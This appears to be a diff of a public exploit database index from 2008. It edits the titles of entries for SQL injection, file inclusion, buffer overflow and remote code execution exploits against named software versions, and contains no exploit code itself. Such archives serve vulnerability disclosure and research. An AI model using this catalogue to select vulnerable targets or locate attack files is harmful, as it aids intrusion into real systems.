Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0 6192,platforms/php/webapps/6192.txt,"k-links directory - (SQL/XSS) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0 6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition - (pid) SQL Injection",2008-08-02,Mr.SQL,php,webapps,0 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 @@ -5812,144 +5812,144 @@ id,file,description,date,author,platform,type,port 6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - (reboot) Remote Denial of Service Exploit",2008-08-03,crit3rion,hardware,dos,0 6199,platforms/php/webapps/6199.pl,"Joomla Component EZ Store Remote Blind SQL Injection Exploit",2008-08-03,His0k4,php,webapps,0 6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 - (index.php page) Local File Inclusion",2008-08-03,SirGod,php,webapps,0 -6201,platforms/windows/dos/6201.html,"HydraIrc <= 0.3.164 - (last) Remote Denial of Service Exploit",2008-08-04,securfrog,windows,dos,0 +6201,platforms/windows/dos/6201.html,"HydraIrc 0.3.164 - (last) Remote Denial of Service Exploit",2008-08-04,securfrog,windows,dos,0 6203,platforms/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusion Vulnerabilities",2008-08-04,"Virangar Security",php,webapps,0 -6204,platforms/php/webapps/6204.txt,"Plogger <= 3.0 - Remote SQL Injection",2008-08-05,"GulfTech Security",php,webapps,0 -6205,platforms/php/webapps/6205.txt,"iges CMS <= 2.0 - (XSS/SQL) Multiple Vulnerabilities",2008-08-05,BugReport.IR,php,webapps,0 -6206,platforms/php/webapps/6206.txt,"LiteNews <= 0.1 Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps,0 -6207,platforms/php/webapps/6207.txt,"LiteNews <= 0.1 - (id) Remote SQL Injection",2008-08-05,Stack,php,webapps,0 +6204,platforms/php/webapps/6204.txt,"Plogger 3.0 - SQL Injection",2008-08-05,"GulfTech Security",php,webapps,0 +6205,platforms/php/webapps/6205.txt,"iges CMS 2.0 - (XSS/SQL) Multiple Vulnerabilities",2008-08-05,BugReport.IR,php,webapps,0 +6206,platforms/php/webapps/6206.txt,"LiteNews 0.1 Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps,0 +6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - (id) SQL Injection",2008-08-05,Stack,php,webapps,0 6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - (LFI) Code Execution",2008-08-06,otmorozok428,php,webapps,0 6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6211,platforms/php/webapps/6211.txt,"quate CMS 0.3.4 - (LFI/XSS) Multiple Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0 -6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - (searchid) Remote SQL Injection Exploit",2008-08-06,james,php,webapps,0 -6215,platforms/php/webapps/6215.txt,"Ppim <= 1.0 - (Arbitrary File Delete/XSS) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0 +6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - (searchid) SQL Injection Exploit",2008-08-06,james,php,webapps,0 +6215,platforms/php/webapps/6215.txt,"Ppim 1.0 - (Arbitrary File Delete/XSS) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0 6216,platforms/windows/dos/6216.html,"Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC",2008-08-10,"Guido Landi",windows,dos,0 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow Exploit",2008-08-10,LiquidWorm,windows,remote,0 6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation PoC",2008-08-10,"Core Security",multiple,dos,0 6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",php,webapps,0 6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BoF Exploit",2008-08-10,"Guido Landi",windows,remote,0 -6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - (id) Remote SQL Injection",2008-08-10,CraCkEr,php,webapps,0 -6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - forums[] Remote SQL Injection Exploit",2008-08-10,irk4z,php,webapps,0 +6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - (id) SQL Injection",2008-08-10,CraCkEr,php,webapps,0 +6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - forums[] SQL Injection Exploit",2008-08-10,irk4z,php,webapps,0 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final (startup.php) Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0 6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 Insecure Cookie Handling",2008-08-10,"Virangar Security",php,webapps,0 -6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0 +6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - (image.php id) SQL Injection",2008-08-10,nuclear,php,webapps,0 6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal",2008-08-11,"Simon Ryeo",multiple,remote,0 6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - (bannerclick.php adid) SQL Injection",2008-08-11,"Hussin X",php,webapps,0 -6231,platforms/php/webapps/6231.txt,"Ppim <= 1.0 - (upload/change password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 -6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - (item) Remote SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 -6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - (mod) Remote SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 +6231,platforms/php/webapps/6231.txt,"Ppim 1.0 - (upload/change password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 +6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - (item) SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 +6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - (mod) SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 6234,platforms/php/webapps/6234.txt,"Joomla 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0 6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - (img) Remote File Disclosure",2008-08-13,JIKO,php,webapps,0 6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 -6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 - NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0 +6237,platforms/multiple/dos/6237.txt,"Ventrilo 3.0.2 - NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0 -6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 - (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 +6239,platforms/multiple/dos/6239.txt,"Ruby 1.9 - (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0Day)",2008-08-13,h07,windows,dos,0 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF PoC",2008-08-14,Symantec,windows,dos,0 6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - (id) Multiple Local File Inclusion Vulnerabilities",2008-08-15,Don,php,webapps,0 6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow Exploit",2008-08-15,SkOd,windows,remote,21 -6249,platforms/php/webapps/6249.txt,"ZEEJOBSITE 2.0 - (adid) Remote SQL Injection",2008-08-15,"Hussin X",php,webapps,0 +6249,platforms/php/webapps/6249.txt,"ZEEJOBSITE 2.0 - (adid) SQL Injection",2008-08-15,"Hussin X",php,webapps,0 6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0 6251,platforms/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 - Privilege Escalation PoC",2008-08-16,g_,windows,dos,0 6252,platforms/multiple/dos/6252.txt,"VLC 0.8.6i - .tta File Parsing Heap Overflow PoC",2008-08-16,g_,multiple,dos,0 6253,platforms/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow DoS / PoC",2008-08-16,j0rgan,windows,dos,0 6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0 -6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) Remote SQL Injection",2008-08-17,"Hussin X",php,webapps,0 +6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) SQL Injection",2008-08-17,"Hussin X",php,webapps,0 6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) BoF Exploit (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0 6257,platforms/windows/dos/6257.pl,"WS_FTP Home/Professional FTP Client Remote Format String PoC",2008-08-17,securfrog,windows,dos,0 6258,platforms/php/webapps/6258.txt,"PHPBasket (product.php pro_id) SQL Injection",2008-08-17,r45c4l,php,webapps,0 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) Remote Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0 -6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple Remote SQL Injection Vulnerabilities",2008-08-18,cOndemned,php,webapps,0 -6261,platforms/php/webapps/6261.txt,"php live helper <= 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 +6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injection Vulnerabilities",2008-08-18,cOndemned,php,webapps,0 +6261,platforms/php/webapps/6261.txt,"php live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 6262,platforms/windows/dos/6262.txt,"VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS",2008-08-18,g_,windows,dos,0 6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory (id) SQL Injection",2008-08-19,"Hussin X",php,webapps,0 -6271,platforms/php/webapps/6271.txt,"Ad Board (id) Remote SQL Injection",2008-08-19,"Hussin X",php,webapps,0 -6273,platforms/php/webapps/6273.txt,"SunShop <= 4.1.4 - (id) Remote SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 -6276,platforms/php/webapps/6276.txt,"Banner Management Script (tr.php id) Remote SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0 -6277,platforms/php/webapps/6277.txt,"Active PHP Bookmarks 1.1.02 - Remote SQL Injection",2008-08-19,"Hussin X",php,webapps,0 -6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object <= 3.2.30 - ActiveX Buffer Overflow Exploit",2008-08-20,"Core Security",windows,remote,0 +6271,platforms/php/webapps/6271.txt,"Ad Board (id) SQL Injection",2008-08-19,"Hussin X",php,webapps,0 +6273,platforms/php/webapps/6273.txt,"SunShop 4.1.4 - (id) SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 +6276,platforms/php/webapps/6276.txt,"Banner Management Script (tr.php id) SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0 +6277,platforms/php/webapps/6277.txt,"Active PHP Bookmarks 1.1.02 - SQL Injection",2008-08-19,"Hussin X",php,webapps,0 +6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow Exploit",2008-08-20,"Core Security",windows,remote,0 6279,platforms/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - XSS / Remote Blind SQL Injection Exploit",2008-08-20,Mr.SQL,php,webapps,0 -6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 - (adid) Remote SQL Injection",2008-08-20,e.wiZz!,php,webapps,0 +6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 - (adid) SQL Injection",2008-08-20,e.wiZz!,php,webapps,0 6281,platforms/php/webapps/6281.pl,"webEdition CMS (we_objectID) Blind SQL Injection Exploit",2008-08-20,Lidloses_Auge,php,webapps,0 -6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 - (CCMS) print.php Remote SQL Injection",2008-08-21,~!Dok_tOR!~,php,webapps,0 -6285,platforms/php/webapps/6285.txt,"PhotoCart <= 3.9 - Multiple Remote SQL Injection Vulnerabilities",2008-08-21,~!Dok_tOR!~,php,webapps,0 +6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 - (CCMS) print.php SQL Injection",2008-08-21,~!Dok_tOR!~,php,webapps,0 +6285,platforms/php/webapps/6285.txt,"PhotoCart 3.9 - Multiple SQL Injection Vulnerabilities",2008-08-21,~!Dok_tOR!~,php,webapps,0 6286,platforms/php/webapps/6286.txt,"BandSite CMS 1.1.4 - (Download Backup/XSS/CSRF) Remote Vulnerabilities",2008-08-21,SirGod,php,webapps,0 6287,platforms/php/webapps/6287.txt,"tinyCMS 1.1.2 - (templater.php) Local File Inclusion",2008-08-21,cOndemned,php,webapps,0 6288,platforms/php/webapps/6288.txt,"easysite 2.3 - Multiple Vulnerabilities",2008-08-21,SirGod,php,webapps,0 -6291,platforms/php/webapps/6291.txt,"noname script <= 1.1 - Multiple Vulnerabilities",2008-08-23,SirGod,php,webapps,0 +6291,platforms/php/webapps/6291.txt,"noname script 1.1 - Multiple Vulnerabilities",2008-08-23,SirGod,php,webapps,0 6292,platforms/php/webapps/6292.txt,"onenews beta 2 - (XSS/hi/SQL) Multiple Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 6293,platforms/multiple/dos/6293.txt,"VLC 0.8.6i Mms Protocol Handling Heap Overflow PoC",2008-08-23,g_,multiple,dos,0 6294,platforms/php/webapps/6294.txt,"5 star review - (XSS/SQL) Multiple Vulnerabilities",2008-08-24,Mr.SQL,php,webapps,0 -6295,platforms/php/webapps/6295.txt,"MiaCMS <= 4.6.5 - Multiple Remote SQL Injection Vulnerabilities",2008-08-24,~!Dok_tOR!~,php,webapps,0 -6296,platforms/php/webapps/6296.txt,"BtiTracker <= 1.4.7 / xbtit <= 2.0.542 - SQL Injection",2008-08-25,InATeam,php,webapps,0 +6295,platforms/php/webapps/6295.txt,"MiaCMS 4.6.5 - Multiple SQL Injection Vulnerabilities",2008-08-24,~!Dok_tOR!~,php,webapps,0 +6296,platforms/php/webapps/6296.txt,"BtiTracker 1.4.7 / xbtit 2.0.542 - SQL Injection",2008-08-25,InATeam,php,webapps,0 6297,platforms/php/webapps/6297.txt,"Matterdaddy Market 1.1 - Multiple SQL Injection Vulnerabilities",2008-08-25,~!Dok_tOR!~,php,webapps,0 -6298,platforms/php/webapps/6298.txt,"Web Directory Script <= 2.0 - (name) SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps,0 +6298,platforms/php/webapps/6298.txt,"Web Directory Script 2.0 - (name) SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps,0 6300,platforms/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusion Vulnerabilities",2008-08-25,DSecRG,php,webapps,0 6301,platforms/php/webapps/6301.txt,"ezContents CMS 2.0.3 - Multiple Local File Inclusion Vulnerabilities",2008-08-25,DSecRG,php,webapps,0 6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a Remote Buffer Overflow Exploit",2008-08-25,"Guido Landi",windows,remote,0 -6303,platforms/php/webapps/6303.txt,"WebBoard <= 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0 +6303,platforms/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,php,webapps,0 6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem Auth Bypass Exploit",2008-08-25,noensr,hardware,remote,0 -6306,platforms/php/webapps/6306.pl,"GeekLog <= 1.5.0 - Remote Arbitrary File Upload Exploit",2008-08-25,t0pP8uZz,php,webapps,0 -6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help <= 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 -6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - (single.php) Remote SQL Injection",2008-08-26,cOndemned,php,webapps,0 +6306,platforms/php/webapps/6306.pl,"GeekLog 1.5.0 - Remote Arbitrary File Upload Exploit",2008-08-25,t0pP8uZz,php,webapps,0 +6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 +6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - (single.php) SQL Injection",2008-08-26,cOndemned,php,webapps,0 6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 - (id) SQL Injection",2008-08-26,Kacak,php,webapps,0 6311,platforms/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) <= 0.5.1 Code Execution Exploit",2008-08-26,mAXzA,php,webapps,0 6312,platforms/php/webapps/6312.txt,"k-rate - (SQL/XSS) Multiple Vulnerabilities",2008-08-26,Corwin,php,webapps,0 6313,platforms/php/webapps/6313.txt,"CMME 1.12 - (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities",2008-08-26,SirGod,php,webapps,0 6314,platforms/php/webapps/6314.txt,"Thickbox Gallery 2.0 - (admins.php) Admin Data Disclosure",2008-08-26,SirGod,php,webapps,0 -6315,platforms/php/webapps/6315.txt,"iFdate <= 2.0.3 - Remote SQL Injection",2008-08-26,~!Dok_tOR!~,php,webapps,0 +6315,platforms/php/webapps/6315.txt,"iFdate 2.0.3 - SQL Injection",2008-08-26,~!Dok_tOR!~,php,webapps,0 6316,platforms/php/webapps/6316.php,"MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit (2)",2008-08-26,c411k,php,webapps,0 6317,platforms/windows/remote/6317.html,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF Exploit",2008-08-26,Koshi,windows,remote,0 6318,platforms/windows/remote/6318.html,"Ultra Office ActiveX Control Remote Buffer Overflow Exploit",2008-08-27,shinnai,windows,remote,0 6319,platforms/windows/dos/6319.html,"Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 -6320,platforms/php/webapps/6320.txt,"phpMyRealty <= 1.0.9 - Multiple Remote SQL Injection Vulnerabilities",2008-08-27,~!Dok_tOR!~,php,webapps,0 -6321,platforms/php/webapps/6321.txt,"YourOwnBux 3.1 / 3.2 Beta - Remote SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 -6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft <= 4.2 Build 98 - (mx4) Local BoF Exploit",2008-08-28,Koshi,windows,local,0 +6320,platforms/php/webapps/6320.txt,"phpMyRealty 1.0.9 - Multiple SQL Injection Vulnerabilities",2008-08-27,~!Dok_tOR!~,php,webapps,0 +6321,platforms/php/webapps/6321.txt,"YourOwnBux 3.1 / 3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 +6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local BoF Exploit",2008-08-28,Koshi,windows,local,0 6323,platforms/windows/remote/6323.html,"Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BoF Exploit",2008-08-28,spdr,windows,remote,0 6324,platforms/windows/remote/6324.html,"Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit",2008-08-28,spdr,windows,remote,0 -6325,platforms/php/webapps/6325.php,"Invision Power Board <= 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,php,webapps,0 +6325,platforms/php/webapps/6325.php,"Invision Power Board 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,php,webapps,0 6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility ActiveX Memory Corruption DoS",2008-08-29,"YAG KOHHA",windows,dos,0 6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar ActiveX Remote Buffer Overflow PoC",2008-08-29,shinnai,windows,dos,0 -6328,platforms/solaris/remote/6328.c,"Sun Solaris <= 10 snoop(1M) Utility Remote Exploit",2008-08-29,Andi,solaris,remote,0 +6328,platforms/solaris/remote/6328.c,"Sun Solaris 10 snoop(1M) Utility Remote Exploit",2008-08-29,Andi,solaris,remote,0 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - (.asx) Local BoF Exploit",2008-08-29,Koshi,windows,local,0 6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow PoC",2008-08-29,Ac!dDrop,windows,dos,0 6332,platforms/php/webapps/6332.txt,"brim 2.0.0 - (SQL/XSS) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - (.bcproj) Local BoF Exploit",2008-08-30,Koshi,windows,local,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 - (site) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 -6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - (word) Remote SQL Injection",2008-08-31,"Hussin X",php,webapps,0 -6337,platforms/linux/local/6337.sh,"Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit",2008-08-31,RoMaNSoFt,linux,local,0 +6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - (word) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 +6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - (symlink) Local Privilege Escalation Exploit",2008-08-31,RoMaNSoFt,linux,local,0 6338,platforms/php/webapps/6338.txt,"myPHPNuke < 1.8.8_8rc2 - (XSS/SQL) Multiple Vulnerabilities",2008-08-31,MustLive,php,webapps,0 6339,platforms/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",2008-08-31,InjEctOr5,php,webapps,0 -6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - (item.php id) Remote SQL Injection",2008-09-01,Stack,php,webapps,0 -6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) Remote SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 -6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) Remote SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 +6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - (item.php id) SQL Injection",2008-09-01,Stack,php,webapps,0 +6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 +6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0 6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - (artid) SQL Injection",2008-09-02,MustLive,php,webapps,0 -6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - (id) Remote SQL Injection",2008-09-02,"Hussin X",php,webapps,0 +6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - (id) SQL Injection",2008-09-02,"Hussin X",php,webapps,0 6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - (site) SQL Injection",2008-09-02,"Hussin X",php,webapps,0 6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME (comment.php artid) SQL Injection",2008-09-02,"security fears team",php,webapps,0 6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME (readarticle.php artid) SQL Injection",2008-09-02,InjEctOr5,php,webapps,0 -6352,platforms/php/webapps/6352.txt,"CS-Cart <= 1.3.5 - (Auth Bypass) SQL Injection",2008-09-02,"GulfTech Security",php,webapps,0 +6352,platforms/php/webapps/6352.txt,"CS-Cart 1.3.5 - (Auth Bypass) SQL Injection",2008-09-02,"GulfTech Security",php,webapps,0 6353,platforms/windows/dos/6353.txt,"Google Chrome Browser 0.2.149.27 - DoS",2008-09-03,"Rishi Narang",windows,dos,0 -6354,platforms/php/webapps/6354.txt,"Spice Classifieds (cat_path) Remote SQL Injection",2008-09-03,InjEctOr5,php,webapps,0 +6354,platforms/php/webapps/6354.txt,"Spice Classifieds (cat_path) SQL Injection",2008-09-03,InjEctOr5,php,webapps,0 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0 -6356,platforms/php/webapps/6356.php,"Moodle <= 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0 +6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (upload/SQL/XSS) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Remote Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 6361,platforms/php/webapps/6361.txt,"Living Local Website (listtest.php r) SQL Injection",2008-09-03,"Hussin X",php,webapps,0 -6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - (adid) Remote SQL Injection",2008-09-04,"Hussin X",php,webapps,0 +6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - (adid) SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL/XSS) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 -6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop (cid) Remote SQL Injection",2008-09-04,"Hussin X",php,webapps,0 +6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop (cid) SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 - (1583) Remote Silent Crash PoC",2008-09-04,WHK,windows,dos,0 -6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC",2008-09-05,ShadOS,hardware,remote,0 +6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS 3.13 SNMP write (Set request) PoC",2008-09-05,ShadOS,hardware,remote,0 6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote BoF Exploit",2008-09-05,SVRT,windows,remote,0 6368,platforms/php/webapps/6368.php,"AWStats Totals (awstatstotals.php sort) Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0 6369,platforms/php/webapps/6369.py,"devalcms 1.4a XSS / Remote Code Execution Exploit",2008-09-05,"Khashayar Fereidani",php,webapps,0 @@ -5965,7 +5965,7 @@ id,file,description,date,author,platform,type,port 6380,platforms/php/webapps/6380.txt,"Vastal I-Tech Mag Zone (cat_id) SQL Injection",2008-09-05,Stack,php,webapps,0 6381,platforms/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone (coder_id) SQL Injection",2008-09-05,Stack,php,webapps,0 6382,platforms/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone (cat_id) SQL Injection",2008-09-05,Stack,php,webapps,0 -6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - (idcat) Remote SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 +6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - (idcat) SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 